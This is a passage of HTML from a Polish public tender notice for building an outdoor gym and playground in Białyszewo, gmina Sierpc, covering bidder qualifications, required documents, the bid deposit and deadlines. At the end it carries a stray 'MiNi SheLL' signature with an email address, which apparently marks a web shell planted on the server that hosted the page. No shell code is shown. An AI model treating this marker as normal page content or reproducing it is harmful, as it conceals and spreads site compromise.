class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. Złożyli ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp;<br/>1.2. Nie podlegają wykluczeniu na zasadach określonych w SWZ;<br/>1.3. Spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/> o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli jest ubezpieczony od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem <br/> zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 100.000,00 zł (słownie: sto <br/> tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie osób zdolnych do wykonania zamówienia.<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) W zakresie doświadczenia zawodowego niezbędnego do wykonania zamówienia. <br/> Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie co najmniej <br/> 1 roboty budowlanej polegającej na budowie, przebudowie lub rozbudowie siłowni zewnętrznej <br/> lub/i placu zabaw o wartości łącznej brutto minimum 100.000,00 zł wykonanych nie wcześniej niż <br/> w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/> działalności jest krótszy – w tym okresie. <br/>W przypadku składania oferty wspólnej w/w warunki <br/> będą oceniane łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (załącznik nr 3 do SWZ); <br/>2. Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania (załącznik nr 3a do SWZ);<br/>3. Oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 6 do SWZ);<br/>4 Odpis lub informację z KRS lub z CEiDG, sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków i opłat, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>6. Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej kasy Rolniczego ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne , wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda aby przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>7. Opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 100.000,00 zł<br/>8. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego (załącznik nr 9 do SWZ).<br/>9. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:<br/>9.1. dokumentu, o którym mowa jest mowa w pkt 4 składa dokument lub <br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. <br/>9.2. zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne. <br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>10. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu <br/> – składane na podstawie art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 2 do SWZ);<br/>2.Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków <br/> udziału w postępowaniu (zgodnie z treścią załącznika nr 2a do SWZ).<br/>3. Oświadczenie z art. 117 ust. 4 ustaw Pzp – Wykonawców wspólnie ubiegających się <br/> o udzielenie zamówienia (zgodnie z treścią załącznika nr 4 do SWZ);<br/>4. Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych <br/> zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie <br/> z treścią załącznika nr 5 do SWZ);<br/>5. Wykaz robót budowlanych obejmujący wykonanie co najmniej 1 roboty budowlanej polegającej <br/> na budowie, przebudowie lub rozbudowie siłowni zewnętrznej lub/ i placu zabaw o wartości łącznej <br/> minimum 100.000,00 zł brutto wykonanej nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed <br/> upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/> okresie – (zgodnie z załącznikiem nr 7 do SWZ). Wykaz ten powinien obejmować rodzaj <br/> wykonanych robót, datę wykonania, miejsca wykonania, kwoty i podmioty, na rzecz których <br/> roboty te zostały wykonane. Do wykazu robót budowlanych należy dołączyć dowody określające, <br/> czy te roboty budowlane zostały wykonane należycie, oraz wskazujących czy zostały wykonane <br/> zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone przy czym dowodami, o których <br/> mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/> budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/> w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wskazany wyżej wykaz robót <br/> Wykonawcy stanowi jedynie minimalne wymagania dla spełnienia warunku udziału <br/> w postępowaniu;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dowód potwierdzający wniesienie wadium.<br/>2. Pełnomocnictwo<br/> - w przypadku złożenia oferty wspólnej pełnomocnictwo udzielone liderowi;<br/> - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych (KRS, <br/> CEiDG lub innego właściwego rejestru), wykonawca który składa ofertę za pośrednictwem <br/> pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym <br/> zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy; <br/> - upoważnienie (pełnomocnictwo) musi w swej treści jednoznacznie wskazywać <br/> uprawnienia do podpisania oferty lub do podpisania oferty i umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta winna być zabezpieczona wadium w wysokości 2.000,00 zł <br/> (słownie: dwa tysiące złotych)<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium w formie <br/> pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. <br/><br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 09.08.2024 roku <br/> licząc od dnia upływu terminu składania ofert. <br/><br/>4. Wykonawca może wnieść wadium w: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/> (j.t.: Dz. U. z 2024 r. poz. 419).<br/><br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić <br/> wadium przelewem na rachunek Zamawiającego: PKO Bank Polski S.A.<br/> Nr konta bankowego: 17 1020 3541 0000 5402 0393 2738, z dopiskiem na przelewie: <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: „Budowa infrastruktury rekreacyjnej na działce o nr ewid. 60 <br/> obręb ewid. Białyszewo, gmina Sierpc”.<br/><br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w wyznaczonym <br/> terminie składania ofert znajduje się na wskazanym rachunku bankowym Zamawiającego. <br/><br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie wadium <br/> w pieniądzu na rachunek bankowy Zamawiającego. <br/><br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa oryginał <br/> dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten powinien być podpisany <br/> kwalifikowanym podpisem elektronicznym przez jego wystawcę. Z treści dokumentu (gwarancji, <br/> poręczenia) winno wynikać bezwarunkowe, na każdym pisemne żądanie zgłoszone przez <br/> Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu <br/> pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/> ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/> i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/> do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/> o których mowa w Rozdziale XIV pkt. 1.1. i 1.2. SWZ, składa każdy z wykonawców. Oświadczenia <br/> te potwierdzają brak podstaw wykluczenia oraz oświadczenie o spełnianiu warunków udziału <br/> w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/> z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy zgodnie <br/> z załącznikiem nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony przewidują możliwość dokonywania zmian postanowień niniejszej Umowy.<br/>2. Zmiana umowy może nastąpić w przypadkach:<br/>1) określonych w art. 455 ustawy Prawo zamówień publicznych,<br/>2) przewidzianych w niniejszej umowie.<br/>3. W przypadku każdej zmiany, o której mowa powyżej, po stronie wnoszącego propozycję zmian <br/> leży uzasadnienie powstałej okoliczności, a wniosek o zmianę postanowień umowy musi być <br/> wyrażony na piśmie.<br/>4. Wszelkie zmiany, uzupełnienia treści niniejszej Umowy mogą być dokonane za zgodą obu stron <br/> w formie pisemnego aneksu pod rygorem nieważności. Każdy sporządzony aneks dla swej <br/> ważności wymaga podpisu obu Stron niniejszej Umowy.<br/>5. Strony przewidują zmiany umowy na podstawie art. 455 ustawy Prawo zamówień publicznych <br/> w zakresie:<br/>1) Zmniejszenia/zwiększenia zakresu rzeczowego,<br/>2) Zmniejszenia/zwiększenia wartości umowy.<br/>6. Zgodnie z art. 455 ustawy Pzp strony dopuszczają możliwość zmiany postanowień zawartej <br/> Umowy w zakresie:<br/>1) realizacji, przez dotychczasowego wykonawcę dodatkowych robót budowlanych, których nie <br/> uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione <br/> łącznie następujące warunki:<br/> a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, <br/> w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub <br/> instalacji zamówionych w ramach zamówienia podstawowego,<br/> b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów <br/> dla zamawiającego, <br/> c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej <br/> umowy. <br/>2) zmiany wysokości ceny, jeśli spowodowana jest okolicznościami, których zamawiający, działając <br/> z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru <br/> umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej <br/> umowy.<br/>3) wynagrodzenia, jeśli łączna ich wartość jest niższa niż 15% wartości pierwotnej umowy, a zmiany <br/> te nie powodują zmiany ogólnego charakteru umowy.<br/>7. Strony dopuszczają możliwość zmiany postanowień zawartej Umowy w zakresie:<br/>1) zmiany terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, <br/>2) zmiany sposobu wykonania Umowy w razie, gdy jest niezbędna ze względów technicznych, <br/> technologicznych lub organizacyjnych, o ile zmiana taka jest korzystna dla Zamawiającego lub <br/> konieczna w celu prawidłowego wykonania Umowy, a brak zmiany sposobu wykonania umowy <br/> skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy pod warunkiem, że <br/> Wykonawca zaoferuje rozwiązania techniczne, technologiczne lub organizacyjne o równoważnych <br/> lub lepszych parametrach; <br/>3) zmiany technologii wykonania, rezygnacji z wykonania części robót; <br/>4) gdy konieczność wprowadzenia zmian będzie następstwem zmian, wytycznych lub zaleceń <br/> instytucji, która przyznała środki na sfinansowanie zamówienia;<br/>5) zmiany terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy;<br/>6) wynagrodzenia w przypadku ustawowej zmiany podatku VAT.<br/>8. Strony dopuszczają możliwość zmiany postanowień zawartej Umowy zmiany umowy w przypadku <br/> zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w zakresie mającym wpływ na <br/> realizację umowy.<br/>9. Zmiana postanowień zawartej umowy, w zakresie terminu wykonania umowy, może nastąpić <br/> w sytuacji gdy fakt opóźnienia w realizacji przedmiotu umowy wynika z przyczyn obiektywnych <br/> niezależnych od Wykonawcy, o których Zamawiający powinien być na bieżąco informowany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com